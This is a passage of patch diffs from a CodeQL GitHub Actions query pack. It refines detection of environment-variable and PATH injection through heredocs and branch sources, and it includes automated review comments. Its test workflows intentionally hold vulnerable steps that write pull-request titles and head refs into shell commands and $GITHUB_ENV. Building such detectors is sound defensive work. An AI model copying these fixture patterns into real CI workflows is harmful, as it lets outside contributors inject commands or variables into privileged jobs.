 run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV
+ - name: Code Injection, do not report as ENV VAR INJ
+ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.head.ref }}") >> $GITHUB_ENV
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml
index 733b15fc9564..5061f51db624 100644
--- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml
@@ -45,5 +45,9 @@ jobs:
 cat <<-"EOF" >> "$GITHUB_ENV"
 echo "FOO=$TITLE"
 EOF
+ - env:
+ TITLE: ${{ github.event.pull_request.head.ref }}
+ run: |
+ echo "PR_TITLE=$TITLE" >> $GITHUB_ENV
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected
index 56345ca896a8..1cb0b78a29b2 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected
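Review bot: The step added to test1.yml reuses the exact `name` of the step directly above it, `Code Injection, do not report as ENV VAR INJ`, so the two negative cases cannot be told apart in query output or in future .expected diffs; name it after the source it exercises, e.g. `- name: Code Injection via head.ref, do not report as ENV VAR INJ`. A short comment on the fixture saying that the `$(echo "${{ ... }}")` command substitution is what makes this a code-injection case rather than an env-var-injection case would document the intent for whoever next edits these expectations. The hunk header counts five old lines but only three context lines are visible here, so the surrounding blank lines are inferred.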
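Review bot: The step added to test4.yml puts `github.event.pull_request.head.ref` into a variable named `TITLE` and writes it out as `PR_TITLE`, which reads as a copy of the title case above it and hides what the new positive case actually covers; `TITLE: ${{ github.event.pull_request.head.ref }}` / `echo "PR_TITLE=$TITLE"` would be clearer as `HEAD_REF` / `PR_HEAD_REF`, so the EnvVarInjection.expected entry this commit adds for test4.yml:49-51 is self-describing. A one-line comment noting that this commit models the PR head ref as an untrusted source (see the sources table and the new EnvVarInjection.expected edge) and therefore expects this write to `$GITHUB_ENV` to be reported would make the expectation explicit. The enclosing `steps:` list begins outside the hunk, so the indentation of the new step is inferred from the collapsed text.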
@@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected index 2dfa8702d591..af4b70d3a601 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected 
@@ -22,5 +22,4 @@ subpaths | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index f88785c38e1a..701cefe2b793 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths From 0f3281c38627ed3d2d5e1812a701f52610209c27 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sun, 28 Apr 2024 09:36:27 +0200
Subject: [PATCH 226/707] Support bash heredoc
---
 ql/lib/codeql/actions/Ast.qll | 38 ++++++++++++++++++-
 .../actions/security/EnvVarInjectionQuery.qll | 5 ++-
 ql/src/Security/CWE-077/EnvPathInjection.ql | 2 +
 ql/src/Security/CWE-077/EnvVarInjection.ql | 20 ++++++----
 .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +--
 .../CWE-077/PrivilegedEnvVarInjection.ql | 24 ++++++------
 .../CWE-077/.github/workflows/test4.yml | 9 ++++-
 .../Security/CWE-077/EnvVarInjection.expected | 9 +++--
 .../PrivilegedEnvVarInjection.expected | 11 ++++--
 9 files changed, 92 insertions(+), 32 deletions(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 8e36aef408ec..bfbc990d6712 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -46,18 +46,39 @@ module Utils { bindingset[var] private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV result = - ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } bindingset[var] private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } + bindingset[var] + private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" + } + bindingset[script, var] predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment 
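Review bot: The pattern in `multilineHereDocAssignmentRegex` insists on an `echo`/`Write-Output` inside the heredoc body, but the body of a `cat <<EOF >> "$GITHUB_ENV"` heredoc is appended to the env file verbatim, so the usual form with bare `KEY=$VALUE` lines and no `echo` is never matched. Making the command prefix optional, e.g. `((echo|Write-Output)\\s+)?([^=]+)=(.*)`, would cover it, but it shifts the capture groups that `extractMultilineAssignment` indexes in the following hunk (key 2, value 3), so those would need adjusting too. The same regex also matches `GITHUB_.*` before `var.toUpperCase()`, unlike the two sibling regexes that require `GITHUB_` directly followed by the variable; on the flattened script that `.*` can span lines, so a heredoc redirected to `$GITHUB_OUTPUT` whose body later contains `ENV` and an `echo X=` line could be reported as a GITHUB_ENV assignment, and `"\\$[\\{]*GITHUB_" + var.toUpperCase() + "[\\}]*[\"']*.*(echo|Write-Output)..."` removes that. Finally, `[A-Z]*EOF` deliberately rejects quoted delimiters such as `<<-"EOF"` and `<<'EOF'`, which suppress expansion in the body; that is worth stating in the comment, e.g. `// quoted delimiters (<<"EOF", <<'EOF') disable expansion and are intentionally not matched`.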
@@ -87,6 +108,19 @@ module Utils { .splitAt("\n") + ")" and key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) } bindingset[line] diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6e6e768bdf79..0467a51f4e9c 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -39,7 +39,10 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { * that is used to construct and evaluate an environment variable. */ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" + } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 50ad01497035..80d1729b2670 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql 
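Review bot: The new `not source.(RemoteFlowSource).getSourceType() = "branch"` in `EnvVarInjectionConfig::isSource` is a precision decision with security consequences and carries no comment; presumably it rests on git ref names not being allowed to contain control characters or whitespace, so a branch name can alter a value but cannot append further `KEY=VALUE` lines to GITHUB_ENV. I would record that next to the condition: `// branch names cannot contain newlines, so they cannot introduce additional variable definitions into GITHUB_ENV`. Since this commit also drops the equivalent `not ... = "branch"` clause from EnvVarInjection.ql and PrivilegedEnvVarInjection.ql, the flow configuration now carries the exclusion for every consumer of EnvVarInjectionFlow, which is worth saying in the module's doc comment as well.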
@@ -20,8 +20,10 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 109d77d74256..8c2510954577 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -16,23 +16,29 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", 
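Review bot: The comment `// exclude paths to file read sinks from non-artifact sources` above the `artifactToFileRead` call in EnvVarInjection.ql describes the opposite of what the predicate does: non-artifact sources pass unconditionally, and it is artifact sources that are kept only when the sink is an `EnvVarInjectionFromFileReadSink`. I would change it to `// artifact sources are only reported when the sink reads the value from a file`, and the predicate's outer parentheses around its single disjunction are redundant. The same predicate and comment are duplicated verbatim in PrivilegedEnvVarInjection.ql later in this commit; both queries already import codeql.actions.security.EnvVarInjectionQuery, so defining it once there would keep the two queries in step.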
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index 593fd620c9f5..a25473fd812e 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -19,10 +19,8 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bf637af11958..5311d9a4de85 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql 
@@ -16,20 +16,22 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 5061f51db624..154a8135bad4 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
@@ -42,12 +42,19 @@ jobs: - env: TITLE: ${{ github.event.pull_request.title }} run: | - cat <<-"EOF" >> "$GITHUB_ENV" + cat <<-EOF >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.head_ref }} + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.event.pull_request.title }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 1cb0b78a29b2..241a33146b88 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
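Review bot: Replacing `cat <<-"EOF" >> "$GITHUB_ENV"` with `cat <<-EOF >> "$GITHUB_ENV"` turns the fixture's only quoted-delimiter heredoc into a positive case, so nothing now checks that the quoted form, where `$TITLE` is written literally rather than expanded, stays unreported. Keeping the original step and adding the unquoted variant as a separate step would pin both the match and the non-match in the .expected files. The two `${TARGET_BRANCH##*/}` steps are a good pair for the branch-source exclusion; the `github.head_ref` one would be clearer with a step name marking it as not reportable, as test1.yml does with `Code Injection, do not report as ENV VAR INJ`.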
@@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> 
$GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 701cefe2b793..8c9d923bd35a 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo 